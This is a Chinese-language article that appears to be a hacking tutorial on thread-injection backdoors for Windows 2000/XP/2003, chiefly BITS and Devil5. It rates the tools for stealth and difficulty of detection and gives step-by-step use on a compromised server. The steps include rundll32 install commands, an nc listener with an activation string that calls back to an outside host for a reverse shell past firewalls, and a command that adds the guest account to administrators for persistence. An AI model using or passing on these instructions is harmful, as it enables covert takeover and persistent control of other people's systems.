線程插入后門其特點(diǎn)就在于插入二字，這種后門在運(yùn)行的時候并沒有自己的獨(dú)立進(jìn)程，而是插入到其他進(jìn)程中，這樣即便是安裝了防火墻的企業(yè)和用戶，也不能對這樣的后門進(jìn)行有效的防御，這種后門是現(xiàn)在非常主流的一種，很讓防護(hù)的人頭疼，因?yàn)閷λ牟闅⒈容^困難，這種后門本身的功能比較強(qiáng)大。

這類的典范就是國內(nèi)提倡網(wǎng)絡(luò)共享的小榕的BITS了，從它的推出以來，各類安全工具下載園地里BITS就高居榜首，非常多的朋友使用它的過程中感到了方便。

BITS

類型：系統(tǒng)后門

使用范圍：wind200/xp/2003

隱蔽程序：★★★★☆

使用難度：★★★☆☆

危害程序：★★★★☆

查殺難度：★★★★☆

BITS其實(shí)是Background Intelligent Transfer Servicer的縮寫，可以在不知不覺中實(shí)現(xiàn)另一種意義的典型的線程插入后門，有以下特點(diǎn)：進(jìn)程管理器中看不到;平時沒有端口，只是在系統(tǒng)中充當(dāng)臥底的角色;提供正向連接和反向連接兩種功能;僅適合用于windows 200/xp/2003。

運(yùn)用舉例

首先我們用3389登錄上肉雞，確定你有SYSTEM的權(quán)限，將BITS.DLL拷貝到服務(wù)器上，執(zhí)行CMD命令：

rundll32.exe bits.dll,install

這樣就激活了BIST，程序用這個特征的字符來辨認(rèn)使用者，也就相當(dāng)于你的密碼了，然后卸載：rundll32.exe BITS.dll,Uninstall

這是最簡單的使用，這個后門除了隱蔽性好外，還有兩大特點(diǎn)是非常 值得借鑒的：端口復(fù)用和正反向連接。雖然很多朋友經(jīng)常聽到這兩個名詞，但并不了解它們，端口復(fù)用就是利用系統(tǒng)正常的TCP端口通訊和控制，比如80、139等，這樣的后門有個非常 大的好處就是非常 隱蔽，不用自己開端口也不會暴露自己的訪問，因?yàn)橥ㄓ嵄旧砭褪窍到y(tǒng)的正常訪問!另一個是反向連接，這個很常 見，也是后門中一個經(jīng)典思路，因?yàn)閺姆?wù)器上主動方問外邊是不被禁止的，很多很歷害的防火墻就怕這點(diǎn)!

BITS的正向連接很簡單，大家可以參考它的README，這種方式在服務(wù)器沒有防火墻等措施的時候很管用，可以方便地連接，但是遇到有防火墻這樣的方式就不靈了，得使用下面的反向連接方式：

在本地使用NC監(jiān)聽(如：nc -l -p 1234)

用NC連接目標(biāo)主機(jī)的任何一個防火墻允許的TCP端口(80/139/445……)

輸入激活命令：[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email]

目標(biāo)主機(jī)的CMD將會出現(xiàn)NC監(jiān)聽的端口2222，這樣就實(shí)現(xiàn)了繞過防火墻的功能了。

devil5(魔鬼5號)

類型：系統(tǒng)后門

使用范圍：win200/xp/2003

隱蔽程度：★★★★☆

使用難度：★★☆☆☆

危害程序：★★★★☆

查殺難度：★★★☆☆

同BITS一樣，Devil5也是線程插入式的后門，和BITS不同的是它可以很方便的在GUI界面下按照自己的使用習(xí)慣定制端口和需要插入的線程，適合對系統(tǒng)有一定了解的使用都使用，由于是自定義插入線程，所以它更難被查殺，下面我們來看看它的使用。

運(yùn)用舉例：

道德使用它自帶的配置程序EDITDEVIL5.EXE對后門進(jìn)行常規(guī)的配置,包括控制端口、插入線程、連接密碼、時間間隔等方面關(guān)鍵點(diǎn)是對插入線程的定制，一般設(shè)置成系統(tǒng)自帶的SVCHOST，然后運(yùn)行后門就可以控制了。

我們用TELNET連接上去，連接的格式是：TELNET *** 定制的端口，它和其他后門不同之處在于連接后沒有提示的界面，每次執(zhí)行程序也是分開的，必須要每次都有輸入密碼，比如我們丟掉了服務(wù)器和管賬戶，可以激活GUEST后再將GUEST加到管理員權(quán)限，記得每次執(zhí)行命令后加上“>密碼”就可以了：net localgroup administrators guest /add >hkfx，然后你又可以控制服務(wù)器了。

很明顯示，同榕哥的BITS相比，DEVIL5有一些缺陷：不能通過系統(tǒng)自帶端口通訊、執(zhí)行命令比較麻煩，需要每次輸入密碼而且不回顯示輸入內(nèi)容，很容易出錯。但是，它有自己的優(yōu)勢：插入線程可以自已定制，比如設(shè)置IE的線程為插入的目標(biāo)就比較難被查殺：自己提供了專門的查殺工具DELDEVIL5.exe，幫助防護(hù)者清理系統(tǒng);而且它可以任意改名和綁定，使用靈活性上比BITS強(qiáng)……大家選擇哪能款就看自己的喜好了。

另外，PortLess BackDoor等工具也是此類的后門，功能強(qiáng)大，隱蔽性稍差，大家有興趣可以自己研究一下。
 

【編輯推薦】

1. 如何封死黑客后門入侵
2. 如何利用nc構(gòu)建telnet后門控制
3. telnet擴(kuò)展后門方式的匯總及研究
4. 開源軟件為黑客們開好后門？
5. 用Mysql語句來生成后門木馬方案